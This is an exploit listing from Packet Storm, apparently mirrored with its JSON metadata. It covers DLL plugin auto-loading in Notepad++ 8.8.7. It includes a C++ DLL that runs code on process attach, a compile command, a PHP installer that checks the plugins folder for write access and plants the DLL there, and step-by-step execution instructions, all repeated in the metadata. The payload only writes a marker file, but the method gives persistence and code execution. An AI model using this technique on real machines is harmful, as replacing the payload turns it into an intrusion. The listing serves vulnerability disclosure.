📄 Notepad++ 8.8.7 DLL Hijacking_PACKETSTORM:212160

Description

Notepad++ version 8.8.7 DLL hijacking proof of concept exploit...

Basic Information

ID PACKETSTORM:212160

Published Nov 27, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Notepad++ 8.8.7 Unsafe Plugin Persistence AutoLoad |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://notepad-plus-plus.org/downloads/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211934/

[+] Summary :

Notepad++ automatically loads any DLL placed inside its `plugins` directory
without performing validation or signature checks. If the directory permissions
allow write access to unprivileged users, this behavior enables persistence and
arbitrary code execution whenever Notepad++ is started.

This PoC demonstrates the issue safely by loading a benign DLL that only writes
a text file to `C:\Users\Public\npp_poc_loaded.txt` upon being loaded.
No harmful behavior is performed.

[+] Usage
----------
Below is the exact methodology demonstrating the vulnerability end‑to‑end.

1. **Locate Plugin Directory**
The attacker checks for:
%PROGRAMFILES%\Notepad++\plugins\

2. **Check Write Permissions**
If write access is available (weak ACL), the vulnerability is exploitable.

3. **Create Malicious Plugin Folder**
Create a folder such as:
plugins\poc_plugin\

4. **Place Auto‑Loaded DLL**
Inside the folder, place:
poc_plugin.dll

Notepad++ auto-loads any DLL with the same name as the folder name.

5. **Trigger Execution**
Once Notepad++ starts, it loads the DLL automatically.

6. **PoC Verification**
Instead of malicious code, our DLL only writes:
C:\Users\Public\npp_poc_loaded.txt

This provides **irrefutable evidence** that auto-loading executed successfully.

This method mirrors how an actual attacker would exploit the issue — but the
payload here is completely benign and safe.

-------------------------------------------------------------------------------
### PoC DLL Code (C++)

#include <windows.h>
#include <fstream>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved) {
if (reason == DLL_PROCESS_ATTACH) {
std::ofstream f("C:\\Users\\Public\\npp_poc_loaded.txt");
f << "[+] PoC Loaded Successfully by Notepad++\n";
f.close();
}
return TRUE;
}

Compile:
cl /LD poc_plugin.cpp /link /OUT:poc_plugin.dll

-------------------------------------------------------------------------------
### PoC Installer (PHP)

<?php

function get_plugin_dir() {
$pf = getenv("PROGRAMFILES");
return $pf . "\\Notepad++\\plugins\\";
}

function check_write($dir) {
$t = $dir . "test_" . uniqid() . ".tmp";
if (@file_put_contents($t, "x") !== false) { unlink($t); return true; }
return false;
}

function install_poc() {
$dir = get_plugin_dir();

echo "[+] Checking: $dir\n";
if (!is_dir($dir)) { echo "[!] Notepad++ not installed.\n"; return; }

if (!check_write($dir)) {
echo "[!] Directory NOT writable. System NOT vulnerable.\n";
return;
}

echo "[+] Directory writable → Vulnerable.\n";

$folder = $dir . "poc_plugin\\";
if (!is_dir($folder)) mkdir($folder);

$dllSrc = __DIR__ . "\\poc_plugin.dll";
$dllDst = $folder . "poc_plugin.dll";

if (!copy($dllSrc, $dllDst)) {
echo "[!] Failed to deploy PoC.\n";
return;
}

echo "[+] PoC installed.\n";
echo "[*] Open Notepad++ to trigger auto-loading.\n";
}

install_poc();

-------------------------------------------------------------------------------
### Execution
1. Place:
poc.php
poc_plugin.dll
in the same directory.

2. Run:
php poc.php

3. Launch Notepad++.

4. Evidence will appear:
C:\Users\Public\npp_poc_loaded.txt

If this file exists, Notepad++ executed the DLL automatically.

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-27T18:33:06",
    "description": "Notepad++ version 8.8.7 DLL hijacking proof of concept exploit...",
    "published": "2025-11-27T00:00:00",
    "modified": "2025-11-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Notepad++ 8.8.7 DLL Hijacking",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212160",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Notepad++ 8.8.7 Unsafe Plugin Persistence AutoLoad                                                                          |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://notepad-plus-plus.org/downloads/                                                                                    |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/211934/ \n    \n    [+] Summary : \n    \n    Notepad++ automatically loads any DLL placed inside its `plugins` directory\n    without performing validation or signature checks. If the directory permissions\n    allow write access to unprivileged users, this behavior enables persistence and\n    arbitrary code execution whenever Notepad++ is started.\n    \n    This PoC demonstrates the issue safely by loading a benign DLL that only writes\n    a text file to `C:\\Users\\Public\\npp_poc_loaded.txt` upon being loaded.  \n    No harmful behavior is performed.\n    \n    \n    [+] Usage\n    ----------\n    Below is the exact methodology demonstrating the vulnerability end\u2011to\u2011end.\n    \n    1. **Locate Plugin Directory**\n       The attacker checks for:\n           %PROGRAMFILES%\\Notepad++\\plugins\\\n    \n    2. **Check Write Permissions**\n       If write access is available (weak ACL), the vulnerability is exploitable.\n    \n    3. **Create Malicious Plugin Folder**\n       Create a folder such as:\n           plugins\\poc_plugin\\\n    \n    4. **Place Auto\u2011Loaded DLL**\n       Inside the folder, place:\n           poc_plugin.dll\n    \n       Notepad++ auto-loads any DLL with the same name as the folder name.\n    \n    5. **Trigger Execution**\n       Once Notepad++ starts, it loads the DLL automatically.\n    \n    6. **PoC Verification**\n       Instead of malicious code, our DLL only writes:\n           C:\\Users\\Public\\npp_poc_loaded.txt\n    \n       This provides **irrefutable evidence** that auto-loading executed successfully.\n    \n    This method mirrors how an actual attacker would exploit the issue \u2014 but the\n    payload here is completely benign and safe.\n    \n    -------------------------------------------------------------------------------\n    ###  PoC DLL Code (C++)\n    \n    #include <windows.h>\n    #include <fstream>\n    \n    BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved) {\n        if (reason == DLL_PROCESS_ATTACH) {\n            std::ofstream f(\"C:\\\\Users\\\\Public\\\\npp_poc_loaded.txt\");\n            f << \"[+] PoC Loaded Successfully by Notepad++\\n\";\n            f.close();\n        }\n        return TRUE;\n    }\n    \n    Compile:\n        cl /LD poc_plugin.cpp /link /OUT:poc_plugin.dll\n    \n    -------------------------------------------------------------------------------\n    ### PoC Installer (PHP)\n    \n    <?php\n    \n    function get_plugin_dir() {\n        $pf = getenv(\"PROGRAMFILES\");\n        return $pf . \"\\\\Notepad++\\\\plugins\\\\\";\n    }\n    \n    function check_write($dir) {\n        $t = $dir . \"test_\" . uniqid() . \".tmp\";\n        if (@file_put_contents($t, \"x\") !== false) { unlink($t); return true; }\n        return false;\n    }\n    \n    function install_poc() {\n        $dir = get_plugin_dir();\n    \n        echo \"[+] Checking: $dir\\n\";\n        if (!is_dir($dir)) { echo \"[!] Notepad++ not installed.\\n\"; return; }\n    \n        if (!check_write($dir)) {\n            echo \"[!] Directory NOT writable. System NOT vulnerable.\\n\";\n            return;\n        }\n    \n        echo \"[+] Directory writable \u2192 Vulnerable.\\n\";\n    \n        $folder = $dir . \"poc_plugin\\\\\";\n        if (!is_dir($folder)) mkdir($folder);\n    \n        $dllSrc = __DIR__ . \"\\\\poc_plugin.dll\";\n        $dllDst = $folder . \"poc_plugin.dll\";\n    \n        if (!copy($dllSrc, $dllDst)) {\n            echo \"[!] Failed to deploy PoC.\\n\";\n            return;\n        }\n    \n        echo \"[+] PoC installed.\\n\";\n        echo \"[*] Open Notepad++ to trigger auto-loading.\\n\";\n    }\n    \n    install_poc();\n    \n    -------------------------------------------------------------------------------\n    ### Execution\n    1. Place:\n           poc.php\n           poc_plugin.dll\n       in the same directory.\n    \n    2. Run:\n           php poc.php\n    \n    3. Launch Notepad++.\n    \n    4. Evidence will appear:\n           C:\\Users\\Public\\npp_poc_loaded.txt\n    \n    If this file exists, Notepad++ executed the DLL automatically.\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212160",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212160/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply